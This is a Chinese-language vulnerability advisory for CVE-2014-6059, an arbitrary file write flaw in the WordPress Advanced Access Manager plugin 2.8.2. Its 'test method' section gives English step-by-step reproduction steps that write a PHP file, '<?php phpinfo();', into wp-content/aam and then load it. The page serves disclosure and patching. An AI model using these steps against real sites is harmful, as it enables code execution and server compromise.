WordPress Advanced Access Manager插件任意文件覆盖漏洞(CVE-
发布日期:2014-09-03
更新日期:2014-09-04
受影响系统:
WordPress Advanced Access Manager 2.8.2
WordPress Advanced Access Manager
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 69549
CVE(CAN) ID: CVE-2014-6059
Advanced Access Manager插件是访问控制和安全增强工具,可对单个博客或多站点网络进行灵活的控制。
Advanced Access Manager 2.8.2及其他版本允许对任意文件写入任意内容,根据服务器配置,这有可能导致任意代码执行、覆盖核心文件或者上传目录内的文件。
<*来源:Tom Adams
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Visit http://localhost/wp-admin/admin.php?page=aam-configpress
Press “Save” (this creates the “aam_configpress” option)
Visit http://localhost/wp-admin/options.php
Set “aam_configpress” to “test.php”
Press “Save Changes”
Visit http://localhost/wp-admin/admin.php?page=aam-configpress again
Enter “<?php phpinfo();” into the textarea (without the quotes)
Press “Save”
Visit http://localhost/wp-content/aam/test.php
建议:
--------------------------------------------------------------------------------
厂商补丁:
WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: